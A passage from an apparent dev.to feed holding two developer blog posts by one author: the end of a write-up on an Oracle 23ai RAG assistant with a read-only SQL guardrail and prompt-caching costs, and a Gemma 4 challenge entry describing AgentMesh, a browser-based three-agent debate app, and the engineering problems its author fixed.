&lt;p&gt;Bonus: the same script also tried &lt;code&gt;GRANT CREATE INDEX TO ragapp&lt;/code&gt; — which fails because Oracle has no &lt;code&gt;CREATE INDEX&lt;/code&gt; system privilege at all: indexing your own tables comes implicitly with &lt;code&gt;CREATE TABLE&lt;/code&gt;, and indexing other schemas' tables needs &lt;code&gt;CREATE ANY INDEX&lt;/code&gt;. Common muscle-memory error carried over from PostgreSQL or MySQL.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. sqlparse tags CTE statements as &lt;code&gt;Keyword.CTE&lt;/code&gt;, not &lt;code&gt;DML&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;My SQL guardrail had this strict check:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;sqlparse.tokens&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;DML&lt;/span&gt;

&lt;span class="n"&gt;first_token&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;next&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;stmt&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tokens&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;is_whitespace&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;first_token&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ttype&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;DML&lt;/span&gt; &lt;span class="ow"&gt;or&lt;/span&gt; &lt;span class="n"&gt;first_token&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;upper&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SELECT&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;WITH&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;}:&lt;/span&gt;
    &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;SqlGuardError&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Only SELECT and WITH allowed&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The unit test I'd written deliberately included &lt;code&gt;WITH t AS (SELECT 1 FROM dual) SELECT * FROM t&lt;/code&gt; to make sure CTEs would pass. It failed on the first run.&lt;/p&gt;

&lt;p&gt;Reason: sqlparse classifies &lt;code&gt;WITH&lt;/code&gt; as &lt;code&gt;Token.Keyword.CTE&lt;/code&gt; (a subtype of &lt;code&gt;Keyword&lt;/code&gt;), &lt;em&gt;not&lt;/em&gt; &lt;code&gt;Token.Keyword.DML&lt;/code&gt;. My type check rejected it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; stop relying on token type for the first-keyword check and lean on the other guardrails:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;first_val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;first_token&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;upper&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;first_val&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SELECT&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;WITH&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;}:&lt;/span&gt;
    &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;SqlGuardError&lt;/span&gt;&lt;span class="p"&gt;(...)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The banned-keyword scan and dangerous-package regex handle the rest. Multi-layer defence means the first-keyword check doesn't need to be perfect at token-type discrimination — it just needs to recognise legitimate SQL starters.&lt;/p&gt;

&lt;p&gt;What I like about this one: the test caught the bug in seconds. I didn't have to discover it in production with a real CTE-using user. That's the value of a guardrail test suite.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Prompt caching doesn't help on first turns. Only follow-ups.
&lt;/h3&gt;

&lt;p&gt;I'd read about Anthropic's prompt caching dropping costs ~85 % and assumed I'd see that immediately. First eval run, all ten questions: &lt;code&gt;cache_read_input_tokens: 0&lt;/code&gt; across the board. Cost was $0.10 for the run.&lt;/p&gt;

&lt;p&gt;What I missed: each question retrieves a &lt;em&gt;different&lt;/em&gt; set of context chunks. The cached prefix (system prompt + retrieved context) is different per question, so every first turn writes to the cache, none read from it.&lt;/p&gt;

&lt;p&gt;Where caching actually fires is &lt;strong&gt;multi-turn follow-ups on the same retrieval&lt;/strong&gt;. Ask "concurrent request stuck — what do I check?" then "what about OPP memory pressure?" → the second turn reuses the same retrieved context → cache hit, ~85 % cost drop on the cached portion.&lt;/p&gt;

&lt;p&gt;I added a sidebar widget to the Streamlit UI that tracks the live cache hit rate. Now I can &lt;em&gt;see&lt;/em&gt; the cache working when I ask follow-ups in the same chat. Without that visibility I'd have assumed it wasn't working.&lt;/p&gt;

&lt;p&gt;The Anthropic docs are clear about this; I just didn't read carefully enough. The lesson: instrument cost and cache metrics from day one, not as a later optimisation.&lt;/p&gt;
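&lt;p&gt;The instrumentation itself is small. A simplified sketch of deriving per-call cost and a running cache hit rate from the usage fields the API returns — the prices below are illustrative per-million-token rates, not current list prices, and the cache-write surcharge is ignored for brevity:&lt;/p&gt;

```python
# Simplified cost/cache accounting from the usage fields returned per
# message (input_tokens, output_tokens, cache_read_input_tokens).
# Prices are illustrative USD-per-1M-token rates, not current list prices;
# cache-creation surcharges are deliberately omitted.
PRICE_IN, PRICE_OUT, PRICE_CACHE_READ = 3.00, 15.00, 0.30

def call_cost(usage):
    return (usage.get("input_tokens", 0) * PRICE_IN
            + usage.get("output_tokens", 0) * PRICE_OUT
            + usage.get("cache_read_input_tokens", 0) * PRICE_CACHE_READ) / 1_000_000

def cache_hit_rate(calls):
    # Fraction of input tokens served from cache across all calls so far.
    read = sum(c.get("cache_read_input_tokens", 0) for c in calls)
    total = read + sum(c.get("input_tokens", 0) for c in calls)
    return read / total if total else 0.0
```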




&lt;h2&gt;
  
  
  What the numbers look like in practice
&lt;/h2&gt;

&lt;p&gt;Per question over the 10-question golden eval:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Input tokens: ~900–1,500&lt;/li&gt;
&lt;li&gt;Output tokens: ~400–600&lt;/li&gt;
&lt;li&gt;Cost on Claude Sonnet: ~$0.01 per question&lt;/li&gt;
&lt;li&gt;On follow-ups with cache hit: ~$0.002 per question&lt;/li&gt;
&lt;li&gt;Retrieval latency (brute-force VECTOR_DISTANCE on 17 chunks): under 50 ms&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The HNSW vector index is intentionally deferred. Oracle 23ai's HNSW needs &lt;code&gt;vector_memory_size &amp;gt; 0&lt;/code&gt; which requires a database restart. For 17 chunks, brute force is so fast that adding HNSW would be premature optimisation. It's a future blog post — "before/after benchmark when the corpus grows to 10,000 chunks."&lt;/p&gt;
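&lt;p&gt;For reference, the DDL I expect to reach for when that day comes — this is my reading of the 23ai HNSW syntax, unverified against a live instance, with illustrative table and column names:&lt;/p&gt;

```python
# My reading of the 23ai HNSW index DDL, unverified against a live
# instance; rag_chunks/embedding are illustrative names. Requires
# vector_memory_size set to a nonzero value (and a restart) first.
HNSW_INDEX_DDL = """
CREATE VECTOR INDEX rag_chunks_hnsw
  ON rag_chunks (embedding)
  ORGANIZATION INMEMORY NEIGHBOR GRAPH
  DISTANCE COSINE
  WITH TARGET ACCURACY 95
"""
```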




&lt;h2&gt;
  
  
  What I'd do differently if I started over
&lt;/h2&gt;

&lt;p&gt;A few honest self-critiques after sitting with the result for a day:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;More synthetic notes from the start.&lt;/strong&gt; Three is enough to prove the pipeline, but for eval-driven iteration you really want 15–20. I'll grow the dataset over the next few weekends.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hybrid retrieval would have been worth the day.&lt;/strong&gt; Pure vector search has a known weakness: it doesn't always rank obvious keyword matches first. Adding Oracle Text BM25 in parallel and ranking on a combined score can deliver a substantial retrieval-recall improvement on keyword-heavy datasets. It will be the next thing I build.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The MCP server should have AWR/ASH tools from day one.&lt;/strong&gt; The whole point of an Oracle MCP server is to let an LLM read production diagnostics. Top SQL is in there now; AWR snapshot summary, ASH wait-event histogram, and DB time-model breakdown all belong in the next release.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CI should run the eval on every PR, not just locally.&lt;/strong&gt; It does now — added &lt;code&gt;.github/workflows/eval.yml&lt;/code&gt; — but the secrets aren't configured yet so it'll fail on first PR until I add them. Tomorrow problem.&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  The DBA-to-AI take-away
&lt;/h2&gt;

&lt;p&gt;If you're an Oracle DBA reading this, three points to leave you with:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The vector database you might be evaluating in 2026 is already in Oracle.&lt;/strong&gt; Native &lt;code&gt;VECTOR&lt;/code&gt; datatype since 23ai (released 2024). If your shop runs Oracle, your data is already where the embeddings should live. Single SQL surface, single security model, single backup story.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Production AI is mostly the production part.&lt;/strong&gt; Connection pooling, statement timeouts, audit logs, schema allowlists, PII redaction, prompt caching — these are day-one DBA instincts. Most AI tutorials are written by people who haven't carried a pager, and it shows.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Pick a real workload and embed an LLM next to it.&lt;/strong&gt; Don't try to compete with ML researchers. The leverage for DBAs is using AI to make existing data more accessible. A RAG assistant over your team's existing runbooks is a higher-ROI weekend project than learning PyTorch.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The job market in 2026 isn't "DBA versus AI engineer." It's "DBA who can ship AI infrastructure versus everyone else." The data depth is the moat. The AI piece sits on top.&lt;/p&gt;




&lt;h2&gt;
  
  
  Repos and links
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Talk to EBS&lt;/strong&gt; (RAG demo): &lt;a href="https://github.com/shopsmartai/oracle-ebs-rag" rel="noopener noreferrer"&gt;github.com/shopsmartai/oracle-ebs-rag&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;mcp-oracle-dba&lt;/strong&gt; (MCP server): &lt;a href="https://github.com/shopsmartai/mcp-oracle-dba" rel="noopener noreferrer"&gt;github.com/shopsmartai/mcp-oracle-dba&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Both MIT-licensed. Dataset is fully synthetic. If you're an Oracle person working on similar things, my DMs are open — happy to compare notes. If you're a recruiter working on senior roles in AI / data infrastructure or Oracle + cloud automation, also happy to chat.&lt;/p&gt;

&lt;p&gt;Feedback on the post welcome in the comments.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>oracle</category>
      <category>rag</category>
      <category>mcp</category>
    </item>
    <item>
      <title>I Built an AI That Argues With Itself About Anything</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Sat, 09 May 2026 05:48:31 +0000</pubDate>
      <link>https://dev.to/rkondoju/i-built-an-ai-that-argues-with-itself-about-anything-5aa5</link>
      <guid>https://dev.to/rkondoju/i-built-an-ai-that-argues-with-itself-about-anything-5aa5</guid>
      <description>&lt;p&gt;&lt;em&gt;This is a submission for the &lt;a href="https://dev.to/challenges/google-gemma-2026-05-06"&gt;Gemma 4 Challenge: Build with Gemma 4&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;AgentMesh&lt;/strong&gt; is a thinking partner that argues with itself. Ask it any opinionated question and three Gemma 4 agents take different stances on it: a skeptic finds the strongest counter-arguments, an advocate makes the strongest case in favor, and a pragmatist describes how it actually plays out in practice. Each agent searches Wikipedia and Hacker News comments in parallel for evidence, then a synthesizer shows you where the three agreed, where they disagreed, and reconciles them.&lt;/p&gt;

&lt;p&gt;It solves a real problem: single-shot LLMs collapse to one voice. Ask ChatGPT or Gemini "Is the AI bubble about to burst?" and you get a balanced-sounding answer that hides the actual disagreement. The model is averaging perspectives behind the scenes. AgentMesh forces the disagreement to surface, with three agents each holding a fixed stance and a synthesizer that calls out where they parted ways. You see the &lt;em&gt;argument&lt;/em&gt;, not just the conclusion.&lt;/p&gt;

&lt;p&gt;The whole thing runs in the browser with &lt;strong&gt;zero servers contacted by us&lt;/strong&gt;. Two ways to run it:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Local:&lt;/strong&gt; Gemma 4 E2B on your GPU via WebGPU + Transformers.js. ~3 GB first download, then cached. Total privacy: nothing leaves the tab.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cloud (BYOK):&lt;/strong&gt; Bring your own free Google AI Studio key. Calls go from your browser directly to Gemini API, never through any backend of mine. ~30 seconds per query.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Demo
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Live:&lt;/strong&gt; &lt;a href="https://shopsmartai.github.io/agentmesh/" rel="noopener noreferrer"&gt;https://shopsmartai.github.io/agentmesh/&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;Demo Video:&lt;/strong&gt; &lt;a href="https://shopsmartai.github.io/agentmesh/assets/agentmesh-demo.gif" rel="noopener noreferrer"&gt;https://shopsmartai.github.io/agentmesh/assets/agentmesh-demo.gif&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fshopsmartai.github.io%2Fagentmesh%2Fassets%2Fagentmesh-demo.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fshopsmartai.github.io%2Fagentmesh%2Fassets%2Fagentmesh-demo.gif" alt="AgentMesh demo: three Gemma 4 agents arguing through a question, a synthesizer reconciling them" width="8" height="4"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Open it in any modern browser for cloud mode, or Chrome 113+ for local mode. The Settings panel has a radio toggle to pick local or cloud. Try one of the suggestion buttons (&lt;em&gt;Tesla in 2026&lt;/em&gt;, &lt;em&gt;AI bubble?&lt;/em&gt;, &lt;em&gt;Buy a house?&lt;/em&gt;) or type your own opinionated question.&lt;/p&gt;

&lt;h2&gt;
  
  
  Code
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Repo:&lt;/strong&gt; &lt;a href="https://github.com/shopsmartai/agentmesh" rel="noopener noreferrer"&gt;https://github.com/shopsmartai/agentmesh&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;MIT licensed, vanilla JavaScript with no build step. The interesting files:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;js/agents.js&lt;/code&gt; — planner / perspective workers (skeptic, advocate, pragmatist) / synthesizer + multi-source gather&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;js/model.js&lt;/code&gt; — routes &lt;code&gt;model.chat()&lt;/code&gt; to the local Web Worker or the Gemini API; cloud adapter with retry-with-backoff, timeout, fallback chain, thinking-mode stripping&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;js/model.worker.js&lt;/code&gt; — the local model life cycle: load, warmup, streaming chat, throttled progress&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;js/tools.js&lt;/code&gt; — Wikipedia, Hacker News stories + comments, DuckDuckGo, arXiv (CORS-friendly, no keys)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;coi-serviceworker.js&lt;/code&gt; — COOP/COEP header injector so SharedArrayBuffer works on GitHub Pages&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  How I Used Gemma 4
&lt;/h2&gt;

&lt;p&gt;I used &lt;strong&gt;two Gemma 4 sizes&lt;/strong&gt; to power the same architecture at two scales:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Gemma 4 E2B&lt;/strong&gt; for local, in-browser inference. ~3.1 GB at q4f16, runs in a Web Worker via Transformers.js + ONNX Runtime + WebGPU.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Gemma 4 E4B (&lt;code&gt;gemma-4-26b-a4b-it&lt;/code&gt;)&lt;/strong&gt; for cloud inference. 26B total params with 4B active (Mixture-of-Experts), hosted on Google AI Studio. Falls back to &lt;strong&gt;31B Dense (&lt;code&gt;gemma-4-31b-it&lt;/code&gt;)&lt;/strong&gt; if E4B has a transient issue.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Same model family, two scales, so the local and cloud paths produce similarly shaped answers. Pick your trade-off: privacy + slow (local) or speed + a bigger model (cloud).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why Gemma 4 specifically.&lt;/strong&gt; Multi-perspective agents only work if the model has three properties at once, and Gemma 4 ships all three:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Strong instruction following.&lt;/strong&gt; The skeptic must actually argue against the topic. The advocate must actually argue for it. Smaller models drift, hedge, or write balanced summaries that ignore their assigned stance. I tested SmolLM2-360M as a control and it cannot stay in role: tell it "you are the skeptic" and it writes a balanced paragraph anyway. Gemma 4 stays sharp across all three perspectives. The roles do not blur.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Refuses to invent facts when notes are thin.&lt;/strong&gt; Workers anchor in research notes when they support the stance, and use general training knowledge to fill gaps when notes are weak. They are honest about which claims have evidence vs which are widely-held belief. The hallucination resistance is what makes the disagreement &lt;em&gt;trustworthy&lt;/em&gt; rather than theatrical.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Browser to server, one architecture.&lt;/strong&gt; E2B at q4f16 is small enough to fit in a Chrome tab alongside the ONNX runtime and a streaming UI. E4B and 31B Dense are server-class and Google hosts them on AI Studio for free with a personal API key. So the local and cloud paths use the same model family with no architectural rework.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;E2B and the larger variants both expose a 128K context window. I am not using all of it yet, but the headroom means future versions can feed full documents to the perspective agents instead of search snippets.&lt;/p&gt;




&lt;p&gt;The rest of this post is the engineering writeup. There is more of it than I expected when I started.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why three agents instead of one
&lt;/h2&gt;

&lt;p&gt;Try this in your head. Ask any chat model "Is buying a Tesla a good investment in 2026?" You will get a balanced essay. The model will give you one paragraph for each side and a polite ending. It is fine. It is also boring. It is hiding what the model actually thinks each side's strongest argument is.&lt;/p&gt;

&lt;p&gt;A multi-agent system can do something a single call cannot. You give each agent a fixed role and a separate context. The skeptic does not get to soften its view by also writing the advocate's paragraph. The advocate does not get to hedge. They have to commit. Only then do you reconcile.&lt;/p&gt;

&lt;p&gt;This is the only architecture I know of where the multi-agent shape gives a concrete win that single-call inference cannot match. It is not "five agents read the same Wikipedia article and produce variants." It is three agents holding three positions and a synthesizer showing the gap.&lt;/p&gt;

&lt;p&gt;The architecture also makes the answer better in a small way that matters. Each agent searches Wikipedia AND Hacker News comments in parallel for evidence supporting its stance. Wikipedia gives encyclopedic facts. HN comments give substantive user opinions and lived experience. Workers see both, anchor in the parts that support their stance, and ground their argument in real material rather than hallucinating.&lt;/p&gt;

&lt;h2&gt;
  
  
  The two modes (more detail)
&lt;/h2&gt;

&lt;p&gt;Local mode runs Gemma 4 E2B on your GPU. First page load downloads about 3.1 GB of weights into the browser cache. After that, reload is instant. Inference takes 3 to 5 minutes per query on a consumer GPU because WebGPU LLM inference is single-stream and we have five sequential model calls per swarm. Privacy is total: nothing leaves the tab once weights are cached.&lt;/p&gt;

&lt;p&gt;Cloud mode runs Gemma 4 E4B (&lt;code&gt;gemma-4-26b-a4b-it&lt;/code&gt;) on Google's servers via the Gemini API. You bring your own free key from &lt;a href="https://aistudio.google.com/app/apikey" rel="noopener noreferrer"&gt;aistudio.google.com/app/apikey&lt;/a&gt;. The key lives only in your browser's localStorage; it is never embedded in the public code, never transmitted to anyone except Google. Inference takes 20 to 40 seconds per query. The privacy story shifts: queries go through Google.&lt;/p&gt;

&lt;p&gt;You pick. The Settings panel has a radio toggle and a key input. The header tells you which mode is active.&lt;/p&gt;

&lt;h2&gt;
  
  
  The eight engineering problems
&lt;/h2&gt;

&lt;p&gt;Naming the problems is the actual point of this post because most of them are reusable knowledge for anyone trying to ship browser-LLM apps.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. The page was not cross-origin isolated
&lt;/h3&gt;

&lt;p&gt;GitHub Pages does not let you set custom HTTP headers. Without two specific headers (&lt;code&gt;Cross-Origin-Opener-Policy: same-origin&lt;/code&gt; and &lt;code&gt;Cross-Origin-Embedder-Policy: credentialless&lt;/code&gt;), the browser will not enable &lt;code&gt;SharedArrayBuffer&lt;/code&gt;. The ONNX runtime needs &lt;code&gt;SharedArrayBuffer&lt;/code&gt; to run on WebGPU. Without it, every model load failed with raw numeric errors that pointed into the WebAssembly heap (literal numbers like &lt;code&gt;11514632&lt;/code&gt;).&lt;/p&gt;

&lt;p&gt;Fix: ship a service worker (adapted from coi-serviceworker, MIT) that intercepts every response and adds the missing headers. First load registers the worker and reloads. After that, the page is cross-origin isolated and &lt;code&gt;SharedArrayBuffer&lt;/code&gt; becomes available.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. WebGPU compile froze the tab for a minute
&lt;/h3&gt;

&lt;p&gt;The first time the ONNX runtime loads a model on WebGPU, it has to compile shaders for every operation in the network. For Gemma 4 E2B that takes anywhere from thirty seconds to over a minute. Done on the main thread, the page becomes unresponsive.&lt;/p&gt;

&lt;p&gt;Fix: put the entire model life cycle in a Web Worker. The page sees a thin proxy that exposes &lt;code&gt;model.load(onProgress)&lt;/code&gt; and &lt;code&gt;model.chat(messages, opts)&lt;/code&gt;. The proxy talks to the worker over &lt;code&gt;postMessage&lt;/code&gt;. Heavy work happens off the main thread; the page stays interactive.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. The worker flooded the main thread anyway
&lt;/h3&gt;

&lt;p&gt;After moving the model into the worker, the page froze again for a different reason. Transformers.js fires a progress callback for every chunk of the download. With a 1.5 GB file, that is hundreds of events per second. Each one became a &lt;code&gt;postMessage&lt;/code&gt; to the main thread. The main thread message queue saturated.&lt;/p&gt;

&lt;p&gt;Fix: throttle progress messages to one every 100 milliseconds. Always send state changes immediately (started, finished, ready) but coalesce the actual progress percentages.&lt;/p&gt;
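&lt;p&gt;The throttle is small enough to sketch. This is an illustrative shape, not the actual code in &lt;code&gt;js/model.worker.js&lt;/code&gt; (&lt;code&gt;makeProgressThrottle&lt;/code&gt; is a hypothetical name): state changes post immediately, percentage updates coalesce to at most one per interval, and a trailing timer flushes the last pending value so the bar never stalls short of the truth.&lt;/p&gt;

```javascript
// Illustrative sketch of the worker-side progress throttle.
// post() stands in for the worker's postMessage wrapper.
function makeProgressThrottle(post, intervalMs = 100) {
  let lastSent = 0;   // timestamp of the last progress message sent
  let pending = null; // most recent coalesced progress message
  let timer = null;

  const flush = () => {
    timer = null;
    if (pending) {
      lastSent = Date.now();
      post(pending);
      pending = null;
    }
  };

  return (msg) => {
    // State changes (started, finished, ready) always go through immediately.
    if (msg.type !== 'progress') {
      post(msg);
      return;
    }
    const now = Date.now();
    if (now - lastSent >= intervalMs) {
      lastSent = now;
      post(msg);
    } else {
      pending = msg; // keep only the latest percentage
      if (!timer) timer = setTimeout(flush, intervalMs - (now - lastSent));
    }
  };
}
```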

&lt;h3&gt;
  
  
  4. Wikipedia search returned nothing for verbose questions
&lt;/h3&gt;

&lt;p&gt;Pressure-testing the live site exposed a fundamental issue. Even simple queries like "What is photosynthesis?" were producing answers like "research notes are empty." Two of three workers were giving up.&lt;/p&gt;

&lt;p&gt;The bug was upstream. The model-driven planner was generating verbose sub-questions like "What is the fundamental definition of photosynthesis and its core chemical processes?" Wikipedia's classic search API does title-prefix matching, and that string is not the prefix of any Wikipedia article title.&lt;/p&gt;

&lt;p&gt;Fix in three parts. Switch to Wikipedia's full-text search API. Strip filler words from the search query before sending it (a list of about 60 question-shape filler words). Add a relevance gate: if no result title contains a meaningful word from the query, treat it as zero results and cascade to a different source.&lt;/p&gt;
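&lt;p&gt;The cleanup and the relevance gate can be sketched like this. The function names are illustrative and the filler list is a small subset of the roughly 60 words the real &lt;code&gt;js/tools.js&lt;/code&gt; strips; the shape is the point.&lt;/p&gt;

```javascript
// Illustrative subset of the ~60 question-shape filler words.
const FILLER = new Set([
  'what', 'is', 'the', 'a', 'an', 'of', 'and', 'its', 'are',
  'how', 'why', 'does', 'do', 'fundamental', 'core', 'definition',
]);

// Strip punctuation and filler before sending the query to full-text search.
function cleanQuery(q) {
  return q
    .toLowerCase()
    .replace(/[?.!,]/g, '')
    .split(/\s+/)
    .filter((w) => w && !FILLER.has(w))
    .join(' ');
}

// Relevance gate: treat the result set as empty unless some result title
// shares a meaningful (longer than 3 chars) word with the cleaned query.
function relevant(results, cleaned) {
  const words = cleaned.split(' ').filter((w) => w.length > 3);
  return results.filter((r) =>
    words.some((w) => r.title.toLowerCase().includes(w)));
}
```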

&lt;h3&gt;
  
  
  5. The planner was spending 30 seconds on something a regex could do
&lt;/h3&gt;

&lt;p&gt;The original planner used the model itself to extract the topic and generate three search queries. It took about 30 seconds on Gemma 4. Then I noticed the model was just echoing the user's full question into the template. It was not actually doing extraction. It was a slow templating engine.&lt;/p&gt;

&lt;p&gt;Fix: replace the planner's model call with a small JavaScript function. Strip leading question words and trailing punctuation. Strip "X better than Y" comparisons to keep just X. Cap at 3 words. Done in milliseconds. The planner card still appears in the swarm visualization; it just shows the topic immediately rather than streaming through 30 seconds of model generation.&lt;/p&gt;
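&lt;p&gt;A minimal version of that deterministic planner looks like this (&lt;code&gt;extractTopic&lt;/code&gt; is a hypothetical name; the real function lives in the repo and handles more comparison shapes):&lt;/p&gt;

```javascript
// Deterministic topic extraction: question words off the front,
// punctuation off the back, comparisons cut down to their subject,
// capped at three words. Milliseconds instead of a 30-second model call.
function extractTopic(question) {
  let t = question
    .trim()
    .replace(/^(is|are|should|will|can|does|do|what|why|how|would)\b\s*/i, '')
    .replace(/[?.!]+$/, '');
  // "X better than Y" comparisons: keep just X.
  t = t.replace(/\s+(better|worse)\s+than\s+.*$/i, '');
  return t.split(/\s+/).slice(0, 3).join(' ');
}
```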

&lt;h3&gt;
  
  
  6. Wikipedia gave facts but no opinions
&lt;/h3&gt;

&lt;p&gt;For opinion questions ("Is remote work better than in-office work?"), Wikipedia gave the encyclopedic article on remote work, which is descriptive, not opinionated. Workers correctly noticed they could not construct a real critique from descriptive material and refused.&lt;/p&gt;

&lt;p&gt;Fix: search multiple sources in parallel. For every worker query, fetch Wikipedia AND Hacker News comments at the same time. Wikipedia provides encyclopedic grounding. HN comments provide actual user opinions and lived experience, with paragraphs of real takes that no encyclopedia has. Workers see both and decide what to anchor on. The "0 servers contacted" line in the footer lost its third significant digit but the architecture finally produces grounded opinion content.&lt;/p&gt;
